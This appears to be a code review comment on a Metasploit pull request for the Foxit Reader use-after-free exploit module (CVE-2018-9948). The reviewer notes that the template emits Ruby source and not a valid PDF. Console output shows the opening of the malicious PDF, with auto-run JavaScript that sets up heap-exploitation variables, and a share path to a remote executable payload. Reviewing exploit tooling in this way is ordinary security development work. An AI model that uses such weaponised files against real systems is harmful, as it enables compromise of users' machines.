data/exploits/CVE-2018-9948/template_pdf.erb

```diff
@@ -0,0 +1,130 @@
+require 'erb'
```

Comment:
Not sure if this is intended, but this generates a Ruby file with PDF text, not a PDF. ERB should be a direct substitution.

```
msf5 exploit(windows/fileformat/foxit_reader_uaf) > run

[*] share_path: \\192.168.56.1\w\s.exe
[+] test.pdf stored at /Users/wvu/.msf4/local/test.pdf
msf5 exploit(windows/fileformat/foxit_reader_uaf) > head /Users/wvu/.msf4/local/test.pdf
[*] exec: head /Users/wvu/.msf4/local/test.pdf

require 'erb'

template = %q{
  %PDF
  1 0 obj
  <</Pages 1 0 R /OpenAction 2 0 R>>
  2 0 obj
  <</S /JavaScript /JS (

  var heap_ptr   = 0;
msf5 exploit(windows/fileformat/foxit_reader_uaf) >
```

Against `master`:

```
msf5 exploit(windows/fileformat/foxit_reader_uaf) > head /Users/wvu/.msf4/local/test.pdf
[*] exec: head /Users/wvu/.msf4/local/test.pdf

%PDF
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>>
2 0 obj
<</S /JavaScript /JS (

var heap_ptr   = 0;
var foxit_base = 0;
var pwn_array  = [];

msf5 exploit(windows/fileformat/foxit_reader_uaf) >
```